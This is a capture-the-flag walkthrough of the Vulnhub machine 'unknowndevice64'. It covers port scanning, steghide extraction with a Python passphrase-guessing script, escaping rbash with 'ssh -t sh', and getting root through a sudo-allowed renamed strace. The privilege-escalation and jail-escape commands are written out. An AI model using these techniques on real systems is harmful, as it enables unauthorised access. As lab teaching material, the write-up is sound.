Vulnhub: unknowndevice64

Today we are solving "unknowndevice64" from Vulnhub - the most recent machine as of this writing.


Name: unknowndevice64: 1
Operating System: Linux
Url: https://www.vulnhub.com/entry/unknowndevice64-1,293/
Release: 9 Mar 2019
Difficulty: Intermediate(??)
Description: unknowndevice64 v1.0 is a medium level boot2root challenge. Follow your intuitions ... and enumerate!


As always, let's start with Nmap, scanning all TCP ports with default scripts and version detection.

nmap -sC -sV -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-13 21:17 CET
Nmap scan report for
Host is up (0.000066s latency).
Not shown: 65533 closed ports
1337/tcp  open  ssh     OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:af:04:6d:f1:8c:59:3a:d6:e1:96:b7:f7:fc:57:83 (RSA)
|   256 12:68:4c:6b:96:1e:51:59:32:8a:3d:41:0d:55:6b:d2 (ECDSA)
|_  256 da:3e:28:52:30:72:7a:dd:c3:fb:89:7e:54:f4:bb:fb (ED25519)
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-title:    Website By Unknowndevice64   
MAC Address: 00:0C:29:12:74:FE (VMware)

Let's start with the web server.
Visiting the web server gives us the following page:

Nothing interesting is displayed on the page itself.
Looking at the source code, however, reveals something interesting: a reference to an image called key_is_h1dd3n.jpg.

Downloading key_is_h1dd3n.jpg gives us the following image:

Exiftool gives us nothing interesting:

Same with binwalk:

binwalk key_is_h1dd3n.jpg 

0             0x0             JPEG image data, JFIF standard 1.01

But running steghide against the image prompts us for a password!

steghide extract -sf key_is_h1dd3n.jpg 
Enter passphrase: 
steghide: could not extract any data with that passphrase!

Guessing the passphrase is easy, since it is right there in the filename: h1dd3n.

steghide extract -sf key_is_h1dd3n.jpg 
Enter passphrase: 
wrote extracted data to "h1dd3n.txt".
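The guess above was made by eye, but the same idea (the passphrase is hiding in the file name) can be automated. The following is an added example written for this walkthrough, not code from the original post: it splits the stego file's name into tokens, adds a few leet-speak de-obfuscations and the empty passphrase, and feeds each guess to the real steghide binary via its -p flag. The candidate generator is pure Python; try_passphrases() needs steghide on PATH.

```python
"""Derive steghide passphrase candidates from a stego file's name and try them.

Added example for this walkthrough, not code from the original post. The
candidate generator is pure Python; try_passphrases() shells out to the real
steghide binary and therefore needs it on PATH.
"""
import re
import shutil
import subprocess
from pathlib import Path
from typing import List, Optional

# Leet digits are ambiguous ('1' is usually 'i' but sometimes 'l'), so we
# try both mappings rather than guessing one.
LEET_MAPS = (
    str.maketrans("01345", "oieas"),
    str.maketrans("01345", "oleas"),
)


def candidates_from_filename(filename: str) -> List[str]:
    """Turn a name like 'key_is_h1dd3n.jpg' into an ordered list of guesses.

    Guesses: the empty passphrase, each token of the stem (extension
    dropped), the whole stem, and each token with leet digits translated
    back to letters. Order is preserved and duplicates are removed.
    """
    stem = Path(filename).stem                       # 'key_is_h1dd3n'
    tokens = [t for t in re.split(r"[^A-Za-z0-9]+", stem) if t]
    guesses = [""] + tokens + [stem]
    guesses += [t.translate(m) for m in LEET_MAPS for t in tokens]
    return list(dict.fromkeys(guesses))              # ordered de-duplication


def steghide_extract(image: str, passphrase: str,
                     out_file: Optional[str] = None) -> bool:
    """Run `steghide extract` with one passphrase; True if data was written."""
    steghide = shutil.which("steghide")
    if steghide is None:
        raise FileNotFoundError("steghide not found on PATH")
    # -p supplies the passphrase non-interactively, -f overwrites an
    # existing output file, -xf names the output file.
    cmd = [steghide, "extract", "-sf", image, "-p", passphrase, "-f"]
    if out_file:
        cmd += ["-xf", out_file]
    result = subprocess.run(cmd, capture_output=True, text=True)
    return result.returncode == 0


def try_passphrases(image: str, passphrases: List[str]) -> Optional[str]:
    """Return the first passphrase that extracts data, or None."""
    for pw in passphrases:
        if steghide_extract(image, pw):
            return pw
    return None


if __name__ == "__main__":
    image = "key_is_h1dd3n.jpg"   # the file served by the box in this write-up
    found = try_passphrases(image, candidates_from_filename(image))
    print("passphrase:", repr(found) if found is not None else "not found")
```

For this box the candidate list is ['', 'key', 'is', 'h1dd3n', ...], so the third real guess succeeds. When the file name gives nothing, the same try_passphrases() loop works with a wordlist such as rockyou.txt, but steghide is slow, so filename and page-source clues are always worth trying first.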

Printing the contents of h1dd3n.txt:


This is Brainfuck, an esoteric programming language with only eight instructions.

We can use the online interpreter at copy.sh/brainfuck to run this program:

Awesome! That looks like a username/password combination.
Let's try and SSH into the box.

Initial Foothold

root@kali:~# ssh ud64@ -p 1337
ud64@'s password: 
Last login: Wed Mar 13 21:39:33 2019 from
ud64@unknowndevice64_v1:~$ ls -la
-rbash: /bin/ls: restricted: cannot specify `/' in command names

Okay, so we're stuck in rbash. Great.
Before moving on to privilege escalation, we need to break out of the jail.

What if we pass a command to ssh along with the -t option? sshd hands a remote command to the user's login shell as `rbash -c '<command>'`, and rbash only refuses command names that contain a slash, so a bare `sh` is looked up in PATH and executed. That gives us a normal, unrestricted sh; the -t option just allocates a pseudo-terminal so that shell is interactive.

From the man pages:

-t Force pseudo-terminal allocation. This can be used to execute arbitrary screen-based programs on a remote machine, which can be very useful, e.g. when implementing menu services. Multiple -t options force tty allocation, even if ssh has no local tty.

root@kali:~# ssh ud64@ -p 1337 -t sh
ud64@'s password: 
sh-4.4$ ls -la
total 64
drwxr-xr-x 12 ud64 ud64 4096 Dec 31 08:51 .
drwxr-xr-x  6 root root 4096 Dec 31 06:52 ..
-rw-------  1 ud64 ud64 1028 Mar 13 21:42 .bash_history
-rw-------  1 ud64 ud64  108 Dec 31 07:09 .bash_profile
drwx------  2 ud64 ud64 4096 Dec 31 07:22 .config
-rw-r--r--  1 ud64 ud64 3729 Oct 23  2017 .screenrc
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Desktop
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Documents
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Downloads
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Music
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Pictures
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Public
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Videos
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 08:40 prog
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 08:56 web
sh-4.4$ echo #FUCK YOU, rbash

Privilege Escalation

Always, and I mean always, go for the low-hanging fruit first.
By that I mean: check the simplest things (sudo rights, SUID binaries, writable files) before starting a deep enumeration process.

sh-4.4$ sudo -l
User ud64 may run the following commands on unknowndevice64_v1:
    (ALL) NOPASSWD: /usr/bin/sysud64

Okay, so we can run a program called sysud64 as root without a password. Let's run it first and see what it does.

sh-4.4$ sudo /usr/bin/sysud64
/usr/bin/sysud64: must have PROG [ARGS] or -p PID
Try '/usr/bin/sysud64 -h' for more information.

Hmm, I have seen that output before.
Is sysud64 just a renamed copy of strace? If so, we can easily get a root shell. The md5sum of both binaries will tell us:

sh-4.4$ md5sum /usr/bin/sysud64
d8d774ed8ee9907338ca152454a3e435  /usr/bin/sysud64
sh-4.4$ md5sum /usr/bin/strace
d8d774ed8ee9907338ca152454a3e435  /usr/bin/strace

Identical hashes, so sysud64 is a byte-for-byte copy of strace. Well then, let's get a root shell, shall we?

With regular strace, the following command drops us into a shell: strace simply executes the program it is given, and /bin/sh inherits whatever privileges strace runs with. The -o /dev/null just discards the trace output.

sudo strace -o /dev/null /bin/sh

And since sysud64 is strace, and sudo lets us run sysud64 as root, the same one-liner gives a root shell:

sh-4.4$ sudo /usr/bin/sysud64 -o /dev/null /bin/sh
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-4.4# cat /root/flag.txt
Further Reading



